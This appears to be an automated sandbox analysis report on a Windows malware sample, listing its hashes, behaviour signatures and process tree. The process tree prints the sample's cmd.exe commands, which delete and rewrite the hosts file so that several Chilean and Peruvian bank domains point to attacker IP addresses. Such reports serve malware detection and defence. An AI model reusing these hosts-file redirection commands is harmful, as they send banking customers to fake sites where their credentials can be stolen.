Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
10-08-2024 17:02
Behavioral task
behavioral1
Sample
86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe
-
Size
3KB
-
MD5
86e90cd7bb625d388f42f571d3a1ba1b
-
SHA1
3e7030d037190f41940ec1dd1007e0f2ee606317
-
SHA256
33e368cab4ca5caa49e17544e60797f8fa4ec0d4242aa58ab09ea307c70eef75
-
SHA512
2e16d7367593c61af8554b9c90cfc8a6dc0bcf7fe998788d6fea7225f7547c5614e162f0d8159b1178e9a31fd54dc5ce5a3874e46f449deea75a5d5517ebc431
Malware Config
Signatures
-
Drops file in Drivers directory 14 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
resource yara_rule behavioral2/memory/3340-0-0x0000000000400000-0x0000000000407000-memory.dmp upx behavioral2/memory/3340-29-0x0000000000400000-0x0000000000407000-memory.dmp upx -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 3340 wrote to memory of 4864 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 85 PID 3340 wrote to memory of 4864 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 85 PID 3340 wrote to memory of 4864 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 85 PID 4864 wrote to memory of 4492 4864 cmd.exe 86 PID 4864 wrote to memory of 4492 4864 cmd.exe 86 PID 4864 wrote to memory of 4492 4864 cmd.exe 86 PID 3340 wrote to memory of 3368 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 87 PID 3340 wrote to memory of 3368 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 87 PID 3340 wrote to memory of 3368 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 87 PID 3340 wrote to memory of 4816 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 88 PID 3340 wrote to memory of 4816 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 88 PID 3340 wrote to memory of 4816 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 88 PID 3340 wrote to memory of 872 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 89 PID 3340 wrote to memory of 872 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 89 PID 3340 wrote to memory of 872 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 89 PID 3340 wrote to memory of 3912 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 90 PID 3340 wrote to memory of 3912 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 90 PID 3340 wrote to memory of 3912 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 90 PID 3340 wrote to memory of 3208 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 91 PID 3340 wrote to memory of 3208 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 91 PID 3340 wrote to memory of 3208 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 91 PID 3340 wrote to memory of 116 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 92 PID 3340 wrote to memory of 116 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 92 PID 3340 wrote to memory of 116 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 92 PID 3340 wrote to memory of 1108 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 93 PID 3340 wrote to memory of 1108 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 93 PID 3340 wrote to memory of 1108 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 93 PID 3340 wrote to memory of 1760 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 94 PID 3340 wrote to memory of 1760 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 94 PID 3340 wrote to memory of 1760 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 94 PID 3340 wrote to memory of 4840 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 95 PID 3340 wrote to memory of 4840 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 95 PID 3340 wrote to memory of 4840 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 95 PID 3340 wrote to memory of 4928 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 96 PID 3340 wrote to memory of 4928 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 96 PID 3340 wrote to memory of 4928 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 96 PID 3340 wrote to memory of 4968 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 97 PID 3340 wrote to memory of 4968 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 97 PID 3340 wrote to memory of 4968 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 97 PID 3340 wrote to memory of 5012 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 98 PID 3340 wrote to memory of 5012 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 98 PID 3340 wrote to memory of 5012 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 98 PID 3340 wrote to memory of 32 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 99 PID 3340 wrote to memory of 32 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 99 PID 3340 wrote to memory of 32 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 99 PID 3340 wrote to memory of 3060 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 100 PID 3340 wrote to memory of 3060 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 100 PID 3340 wrote to memory of 3060 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 100 PID 3340 wrote to memory of 1160 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 101 PID 3340 wrote to memory of 1160 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 101 PID 3340 wrote to memory of 1160 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 101 PID 3340 wrote to memory of 1376 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 102 PID 3340 wrote to memory of 1376 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 102 PID 3340 wrote to memory of 1376 3340 86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe 102 PID 1376 wrote to memory of 3280 1376 cmd.exe 103 PID 1376 wrote to memory of 3280 1376 cmd.exe 103 PID 1376 wrote to memory of 3280 1376 cmd.exe 103 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4492 attrib.exe 3280 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\86e90cd7bb625d388f42f571d3a1ba1b_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib -r %windir%\system32\drivers\etc\hosts2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SysWOW64\attrib.exeattrib -r C:\Windows\system32\drivers\etc\hosts3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del %windir%\system32\drivers\etc\hosts2⤵
- System Location Discovery: System Language Discovery
PID:3368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 127.0.0.1 localhost >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:4816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 www.officebanking.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 officebanking.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:3912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 www.bancofalabella.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:3208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 bancofalabella.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 www.bbva.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 bbva.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:1760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 www.bancoestado.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:4840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 bancoestado.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:4928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 www.itau.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:4968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 66.23.239.228 itau.cl >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:5012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 208.84.148.239 www.viabcp.com >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:32
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 208.84.148.239 viabcp.com >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:3060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo 208.84.148.239 bcpzonasegura.viabcp.com >> %windir%\system32\drivers\etc\hosts2⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:1160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c attrib +r %windir%\system32\drivers\etc\hosts2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\SysWOW64\attrib.exeattrib +r C:\Windows\system32\drivers\etc\hosts3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:3280
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
192B
MD5e3066bc9a87011100631010586bd77a9
SHA19ea79f7115a4b43d231f4cb513da1387718a4ad8
SHA2565a0f2c56898f90c5cb3d2a2b98962d018710c6c5477d126c75a11cda266c9225
SHA512fa2503916b656b2b66dbf31ec5c8afb79fb45de7a0843628fe37ce73915c5e2ecc359c84e71a704ed88fb6acb8569899c9b4527a3637c0868e9ed83495f37383
-
Filesize
251B
MD564da753b8be6dd275607dec86154a7cb
SHA17d50ff09c7f50a8f4d47344016e7a64c6a32f063
SHA2562ca3a18b589cb01eca6606de156f0aa507a9af115886b56d80a64b1a19255efe
SHA512b1de4070922c45bfc46a8df5a05d9af5abf55a2a32fe1c4b045f3c949fa85ae43a4ece60f88347c9cfad86226ae8a1c5516f89fbd39254da89327ef40b39a20d
-
Filesize
282B
MD5299775837b19024b3c01dbabbc484362
SHA1a4ea0e874c76126278cf9ff77e053eedeb91526b
SHA25634da544145ba9c95dcd9f7063cadbd0f81830bc76890e45acf58f74ea9e6f11b
SHA512aceac4f39cf79b0fcdbff9ffb3ec0153dce7b3b392811b540ec3f7a74f91738b773500258be21e44908695b12e3f8b9b4323f23852b048914472a73bb4d76d95
-
Filesize
310B
MD568a870357fd229010627703f488817b6
SHA17af4d421986d9ec063b9d07e303317ebf7fa0458
SHA2564a5c45c75d0308b4e301ac7c7d0701b97b85a302e4f90e545362e2bec41ce9cc
SHA5125330161c9b3e6098394cceff12663bb75dc4de8256a163a58e20a59261fdf3e2ab84ed34334b0a3e1f410c60eea50e2c34f6c0b62371839e86cef46b11413f99
-
Filesize
59B
MD5c0a1fff7f2de6954373ebcd1d305ea7d
SHA150b2e5b3dfba7c84f542c8d59b91a3e4ce3459ef
SHA25634ecc26febbe78bcf4e1eb37b928c1e582e03d35c83d128b2f39a958d3a0f314
SHA512980b509ccce015f2f658277f776936764ab5d30e0c24a5242ff53ba346c534f1ad9c6a59af209398efc0ccc37bd47c3f7488eac4537f05cb054829ad1b963fcc
-
Filesize
334B
MD5e6f78ed440e1bfba12f233d5fdb5e812
SHA1b2756fcd79bbb44e7e8b25bfb1e1812d54a21352
SHA2568b1ec972baa3c7448dd064c0ad1dc0e9036983b58b0db8daa30b49af17a9f448
SHA5129fdffedba5053e45b96da5ecc03b0439b3bad96e01f01b24f2076d2c7583dda48c5ea9dcca7e4b09da8012e4a78832c385d4a991badeccbea1bfa39525cb5680
-
Filesize
394B
MD530e757081591f8cef2508be057b45a1b
SHA1aeab6549f66a25d5bd00a954216df345923b5f37
SHA25692c7c6448089fe8a9e2450c9c15cde1e73b2dc39f6311bdf736ce363bc11bcd7
SHA512e5b43b3aaed695d36ca0435ecf81d009e17a01b1cd544846d4780af3aa989fa81be4cb0a32e6624a90a47e97df09d22b78757a8344e67915074ee5226d5e8392
-
Filesize
436B
MD5f8779d76795aa6da7f87000c5c7f4738
SHA1cb7382768816e92ccaabcada3d77a8513fa2cc3b
SHA256279d98af9af076b2c5d5e51da87aa9e41b695646d1fab3eb738473004810c78a
SHA512003616d77e09e8cf4465c119147e80db2fdea1398928a8e4310d02389fecb078f39a6a0d11440d11027f23cb7c2a5b971417049367b56a67708087818e37003b
-
Filesize
92B
MD5553eb1da1e73a0ee8d338e3a5b256ff5
SHA18d5612600c51654c692f7f30aa620736938153c0
SHA256f81cf12772defa75cec2bfecf89bfea1593ee1604dc08af984d2cbbeaf4b7d48
SHA512b19ae35bfef3501bf4035660244a3e603a9f828f3793967c276912113863c0f10d781ae0cd6771f3182729fd110bea9162930335ac0f684df81e4c7e4d890151
-
Filesize
130B
MD519d0663eddc39697b497ffc12fb04ffd
SHA14c1aa8e4c6297dee4dab6446af37ca8cd5e777d1
SHA256b712cb86ea0842c59518456288f04f848b5ce846621617106bf2641fb49705ea
SHA512ea731761e0b27310bd17dff1e8e53de553d4153c3f90bd3ee2a0a3c9d8252463d52399dd8783bbf398952e8497243f9ce009140d0d006fbb601f3edf3cc02b38
-
Filesize
164B
MD55e14c695664d8f300f00f0fc6fa61879
SHA1f7b2e0cdd4d3ce5b62a917414917683d5d8935f1
SHA256cce8c01a8dbeb9b1d069b500459ff20118d87a145d394676799de73c448bbb9f
SHA512ad52e6ca7db013062e2c1d7f4ea30feaadf2c83ed91707f5869c6f79bf414bd2ffe359aeefd2fc16c350f26b95569cdb6769c085cea500fcf7cf62066a3d8751